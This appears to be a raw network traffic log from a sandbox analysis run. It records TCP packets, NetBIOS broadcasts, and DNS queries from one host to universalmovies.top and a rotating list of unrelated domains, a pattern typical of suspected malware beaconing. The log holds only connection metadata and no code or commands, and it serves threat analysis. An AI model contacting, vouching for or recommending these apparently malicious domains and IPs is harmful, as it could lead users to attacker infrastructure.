                                                                              Jun 25, 2024 15:13:57.259073973 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259087086 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259087086 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259095907 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259119034 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259119034 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259248972 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259696960 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259802103 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259823084 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259829998 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259843111 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259860039 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259860039 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259871006 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259902000 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259902000 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259902000 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259916067 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259955883 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.259957075 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259957075 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.259968042 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260010004 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260010004 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260325909 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260788918 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260840893 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260884047 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260884047 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260893106 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260904074 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260935068 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260941029 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260958910 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.260981083 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260981083 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.260988951 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261018038 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261018038 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261737108 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261796951 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261799097 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261799097 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261811972 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261874914 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261920929 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.261921883 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261921883 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.261934042 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.262008905 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262008905 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262729883 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.262778997 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.262810946 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262810946 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262821913 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.262835979 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.262877941 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262877941 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.262885094 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.263350010 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.272049904 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.272161007 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.351218939 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.351274967 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.351316929 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.351316929 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.351350069 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.351645947 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.368436098 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.368508101 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.369436026 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.369488001 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.369512081 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.369534969 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.369550943 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.369550943 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.369570971 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372061968 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372118950 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372159958 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372159958 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372179985 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372235060 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372687101 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372735023 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372752905 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372766972 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372800112 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372800112 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372807980 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372822046 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372865915 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372884989 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372893095 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.372926950 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.372926950 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373624086 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373667955 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373677969 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373692036 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373716116 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373716116 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373750925 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373801947 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373801947 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.373804092 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373820066 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.373897076 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.375256062 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.375303984 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.375329971 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.375345945 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.375379086 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.375379086 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461246967 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461301088 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461325884 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461357117 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461395979 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461395979 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461886883 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461929083 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461957932 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461957932 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:13:57.461965084 CEST44349173104.21.74.191192.168.2.22
                                                                              Jun 25, 2024 15:13:57.461996078 CEST49173443192.168.2.22104.21.74.191
                                                                              Jun 25, 2024 15:17:57.197818995 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:57.202708006 CEST8049183192.243.61.227192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 25, 2024 15:13:41.822052956 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:41.834736109 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:43.469650030 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:13:44.233690977 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:13:44.998066902 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:13:45.768246889 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:45.779640913 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:45.781665087 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:45.789361954 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:49.693814039 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:49.706058025 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:49.707600117 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:49.720551014 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:50.904556036 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:50.917550087 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:50.919220924 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:50.926356077 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:52.440567970 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:52.447381020 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:52.449054003 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:52.702608109 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:13:55.916984081 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:13:55.924243927 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:00.202127934 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:00.215677977 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:00.218179941 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:00.235625982 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:02.364087105 CEST | 58105 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:02.370990992 CEST | 53 | 58105 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:02.660696030 CEST | 64928 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:02.667893887 CEST | 53 | 64928 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:32.510732889 CEST | 57390 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:32.523706913 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:14:54.208805084 CEST | 58095 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:14:54.221290112 CEST | 53 | 58095 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:15:29.270454884 CEST | 138 | 138 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:15:33.320872068 CEST | 54261 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:15:34.221479893 CEST | 53 | 54261 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:15:34.222495079 CEST | 54261 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:15:34.375030994 CEST | 53 | 54261 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:15:55.134747028 CEST | 60507 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:15:55.165908098 CEST | 53 | 60507 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:16:15.015436888 CEST | 50446 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:16:15.031598091 CEST | 53 | 50446 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:16:15.032315016 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:15.787904978 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:16.552227974 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:35.449687958 CEST | 55939 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:16:35.475580931 CEST | 53 | 55939 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:16:35.479166031 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:36.239680052 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:37.004209995 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
Jun 25, 2024 15:16:55.761102915 CEST | 49608 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:16:55.772923946 CEST | 53 | 49608 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:17:16.402645111 CEST | 61486 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:17:16.452686071 CEST | 53 | 61486 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:17:35.026262045 CEST | 62453 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:17:35.358678102 CEST | 53 | 62453 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:17:56.382740974 CEST | 50568 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:17:56.692616940 CEST | 53 | 50568 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:17:56.694922924 CEST | 50568 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:17:56.701594114 CEST | 53 | 50568 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:18:15.522667885 CEST | 61467 | 53 | 192.168.2.22 | 8.8.8.8
Jun 25, 2024 15:18:15.687892914 CEST | 53 | 61467 | 8.8.8.8 | 192.168.2.22
Jun 25, 2024 15:18:25.409166098 CEST | 138 | 138 | 192.168.2.22 | 192.168.2.255
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 25, 2024 15:13:41.822052956 CEST | 192.168.2.22 | 8.8.8.8 | 0x14c8 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.768246889 CEST | 192.168.2.22 | 8.8.8.8 | 0x6c8b | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.781665087 CEST | 192.168.2.22 | 8.8.8.8 | 0xb239 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.693814039 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.707600117 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.904556036 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.919220924 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c5b | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.440567970 CEST | 192.168.2.22 | 8.8.8.8 | 0x4189 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.449054003 CEST | 192.168.2.22 | 8.8.8.8 | 0x2383 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:55.916984081 CEST | 192.168.2.22 | 8.8.8.8 | 0x56a7 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.202127934 CEST | 192.168.2.22 | 8.8.8.8 | 0x99e0 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.218179941 CEST | 192.168.2.22 | 8.8.8.8 | 0x98ab | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.364087105 CEST | 192.168.2.22 | 8.8.8.8 | 0xae0f | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.660696030 CEST | 192.168.2.22 | 8.8.8.8 | 0x61d4 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:32.510732889 CEST | 192.168.2.22 | 8.8.8.8 | 0x622a | Standard query (0) | www.onlynaturlpt.shop | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:54.208805084 CEST | 192.168.2.22 | 8.8.8.8 | 0xa59f | Standard query (0) | www.wirewizardselectric.net | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:33.320872068 CEST | 192.168.2.22 | 8.8.8.8 | 0xebec | Standard query (0) | www.cnoszirzbkaqz.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:34.222495079 CEST | 192.168.2.22 | 8.8.8.8 | 0xebec | Standard query (0) | www.cnoszirzbkaqz.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:55.134747028 CEST | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | www.naddafornadda.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:15.015436888 CEST | 192.168.2.22 | 8.8.8.8 | 0xc2c0 | Standard query (0) | www.turbrun.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:35.449687958 CEST | 192.168.2.22 | 8.8.8.8 | 0xb8e | Standard query (0) | www.wzxq.xyz | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:55.761102915 CEST | 192.168.2.22 | 8.8.8.8 | 0xe8fb | Standard query (0) | www.texanboxes.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:16.402645111 CEST | 192.168.2.22 | 8.8.8.8 | 0xbbcb | Standard query (0) | www.outletivo.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:35.026262045 CEST | 192.168.2.22 | 8.8.8.8 | 0xf219 | Standard query (0) | www.380747.net | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.382740974 CEST | 192.168.2.22 | 8.8.8.8 | 0xcf3a | Standard query (0) | www.emeraldsurrogatefabric.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.694922924 CEST | 192.168.2.22 | 8.8.8.8 | 0xcf3a | Standard query (0) | www.emeraldsurrogatefabric.com | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:18:15.522667885 CEST | 192.168.2.22 | 8.8.8.8 | 0x38c8 | Standard query (0) | www.furryfriendsupply.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 25, 2024 15:13:41.834736109 CEST | 8.8.8.8 | 192.168.2.22 | 0x14c8 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:41.834736109 CEST | 8.8.8.8 | 192.168.2.22 | 0x14c8 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.779640913 CEST | 8.8.8.8 | 192.168.2.22 | 0x6c8b | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.779640913 CEST | 8.8.8.8 | 192.168.2.22 | 0x6c8b | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.789361954 CEST | 8.8.8.8 | 192.168.2.22 | 0xb239 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:45.789361954 CEST | 8.8.8.8 | 192.168.2.22 | 0xb239 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.706058025 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.706058025 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.720551014 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:49.720551014 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.917550087 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.917550087 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.926356077 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c5b | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:50.926356077 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c5b | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.447381020 CEST | 8.8.8.8 | 192.168.2.22 | 0x4189 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.447381020 CEST | 8.8.8.8 | 192.168.2.22 | 0x4189 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.702608109 CEST | 8.8.8.8 | 192.168.2.22 | 0x2383 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:52.702608109 CEST | 8.8.8.8 | 192.168.2.22 | 0x2383 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:55.924243927 CEST | 8.8.8.8 | 192.168.2.22 | 0x56a7 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:13:55.924243927 CEST | 8.8.8.8 | 192.168.2.22 | 0x56a7 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.215677977 CEST | 8.8.8.8 | 192.168.2.22 | 0x99e0 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.215677977 CEST | 8.8.8.8 | 192.168.2.22 | 0x99e0 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.235625982 CEST | 8.8.8.8 | 192.168.2.22 | 0x98ab | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:00.235625982 CEST | 8.8.8.8 | 192.168.2.22 | 0x98ab | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.370990992 CEST | 8.8.8.8 | 192.168.2.22 | 0xae0f | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.370990992 CEST | 8.8.8.8 | 192.168.2.22 | 0xae0f | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.667893887 CEST | 8.8.8.8 | 192.168.2.22 | 0x61d4 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:02.667893887 CEST | 8.8.8.8 | 192.168.2.22 | 0x61d4 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:32.523706913 CEST | 8.8.8.8 | 192.168.2.22 | 0x622a | No error (0) | www.onlynaturlpt.shop | | 104.21.89.47 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:32.523706913 CEST | 8.8.8.8 | 192.168.2.22 | 0x622a | No error (0) | www.onlynaturlpt.shop | | 172.67.156.108 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:54.221290112 CEST | 8.8.8.8 | 192.168.2.22 | 0xa59f | No error (0) | www.wirewizardselectric.net | wirewizardselectric.net | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:14:54.221290112 CEST | 8.8.8.8 | 192.168.2.22 | 0xa59f | No error (0) | wirewizardselectric.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:14:54.221290112 CEST | 8.8.8.8 | 192.168.2.22 | 0xa59f | No error (0) | wirewizardselectric.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
